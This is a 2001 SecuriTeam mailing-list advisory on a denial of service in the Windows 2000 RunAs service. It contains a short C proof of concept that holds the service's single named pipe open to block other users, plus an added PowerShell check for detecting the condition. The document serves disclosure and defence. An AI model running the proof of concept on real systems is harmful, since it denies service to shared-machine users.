[NT] Denial of Service Vulnerability in Windows 2000 RunAs Service

From: support@securiteam.com
Date: 11/15/01


From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Denial of Service Vulnerability in Windows 2000 RunAs Service
Message-Id: <20011115172752.3AB63138BF@mail.der-keiler.de>
Date: Thu, 15 Nov 2001 18:27:52 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Denial of Service Vulnerability in Windows 2000 RunAs Service
------------------------------------------------------------------------

SUMMARY

The Windows 2000 RunAs service allows a user to launch an application in a
security context based upon a supplied set of credentials. A newly
discovered attack lets any local user effectively disable the RunAs
service.

DETAILS

Architecturally, all communication with the RunAs service is done by means
of the named pipe "\\.\pipe\secondarylogon". Additionally, the Windows
2000 API CreateProcessWithLogonW uses this communications channel to
launch a process with a supplied set of credentials.

The RunAs service was implemented to serve exactly one client per request.
If more than one client requests service from the RunAs service
simultaneously, the other clients receive the error "231: All pipe
instances are busy".

Consequently, it is possible for one client to simply connect to the pipe
and never request any service. The RunAs service will wait for the client
to either disconnect or send data and will not process any other requests
until that happens.

The attack can also be carried out remotely; however, because of the DACL
associated with the pipe, the only users capable of doing so remotely are
members of the Administrators group.

Consequently, the most applicable context in which this vulnerability
could be leveraged is that of Windows 2000 Terminal Services, where
arbitrary local users share the machine.

// radix1112200103.c - Camisade - Team RADIX - 11-12-2001
//
// Camisade (www.camisade.com) is not responsible for the use or
// misuse of this proof of concept source code.

#define WIN32_LEAN_AND_MEAN
#define UNICODE
#define _UNICODE

#include <windows.h>
#include <tchar.h>

#include <stdio.h>
#include <conio.h>

#define SECLOGON_PIPE _T("\\\\.\\pipe\\secondarylogon")

int main(void)
{
   HANDLE hPipe;

   // Open the service's single pipe instance and then send nothing;
   // while this handle stays open, other clients receive error 231.
   hPipe = CreateFile(SECLOGON_PIPE, GENERIC_READ | GENERIC_WRITE, 0, NULL,
                      OPEN_EXISTING, 0, NULL);
   if (hPipe == INVALID_HANDLE_VALUE)
   {
      // Error 231 (ERROR_PIPE_BUSY) here means another client already holds the instance.
      printf("Unable to open pipe, error %lu\n", GetLastError());
      return 1;
   }

   printf("Connected to pipe. Press any key to disconnect.\n");
   getche();

   CloseHandle(hPipe);   // releasing the handle lets the service resume
   return 0;
}

Vendor information:
Microsoft has decided to include the fix within Service Pack 3 (SP3).

According to the vendor, "In February 2002, we will release Windows 2000
Service Pack 3 (SP3)".

http://www.microsoft.com/presspass/features/2001/oct01/10-03securityqa.asp
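Added example (not part of the advisory and not Camisade's code): a PowerShell health check that reports, for one host, whether the Secondary Logon service is running, whether the host is still below SP3 (where the vendor placed the fix), and whether a pipe instance is currently free. It assumes the service name 'seclogon', Windows PowerShell 3.0 or later with the .NET NamedPipeClientStream class, and that the probing host is either the Windows 2000 machine itself or an administrator's workstation (remote access to the pipe requires Administrators membership, per the DACL noted above).

```powershell
function Test-SecondaryLogonPipe {
    param(
        [string]$ComputerName = '.',              # '.' = local host; remote probing needs Administrators rights (pipe DACL)
        [string]$PipeName     = 'secondarylogon', # pipe name quoted in the advisory
        [int]   $TimeoutMs    = 2000
    )
    $r = [ordered]@{ Computer = $ComputerName; Service = 'unknown'; Pipe = 'unknown'; PatchLevel = 'unknown'; Detail = '' }

    # 1. Is the Secondary Logon service (service name 'seclogon', assumed) present and running?
    $svc = Get-Service -Name 'seclogon' -ComputerName $ComputerName -ErrorAction SilentlyContinue
    $r.Service = if ($svc) { $svc.Status.ToString() } else { 'not found' }

    # 2. Patch level: the vendor placed the fix in Windows 2000 SP3, so earlier service packs are flagged.
    $os = Get-WmiObject Win32_OperatingSystem -ComputerName $ComputerName -ErrorAction SilentlyContinue
    if ($os -and $os.Caption -match 'Windows 2000') {
        $sp = 0
        if ($os.CSDVersion -match 'Service Pack (\d+)') { $sp = [int]$Matches[1] }
        $r.PatchLevel = if ($sp -ge 3) { "SP$sp (fix included)" } else { "SP$sp (pre-SP3, pipe hold DoS applies)" }
    } elseif ($os) {
        $r.PatchLevel = "$($os.Caption) (not Windows 2000)"
    }

    # 3. Is a pipe instance free? A held instance shows up here as a timeout, which is
    #    what other callers see as error 231 ("All pipe instances are busy").
    $client = New-Object System.IO.Pipes.NamedPipeClientStream($ComputerName, $PipeName, [System.IO.Pipes.PipeDirection]::InOut)
    try {
        $client.Connect($TimeoutMs)
        $r.Pipe = 'available'
    } catch [System.TimeoutException] {
        $r.Pipe = 'busy'
        $r.Detail = "No free instance of \\$ComputerName\pipe\$PipeName within ${TimeoutMs} ms; some client is holding it open."
    } catch {
        $r.Pipe = 'error'
        $r.Detail = $_.Exception.Message
    } finally {
        $client.Dispose()   # release the instance at once so the probe itself never blocks RunAs
    }
    [pscustomobject]$r
}

# Usage:  Test-SecondaryLogonPipe                          (local host)
#         Test-SecondaryLogonPipe -ComputerName w2ksrv01   (constructed host name)
```

A "busy" result while the service is running means some client currently holds the single instance; a legitimate RunAs call releases it within moments, so a result that stays "busy" across repeated probes is the condition this advisory describes.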

ADDITIONAL INFORMATION

The information has been provided by Team RADIX -- Camisade LLC
(research@camisade.com).

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
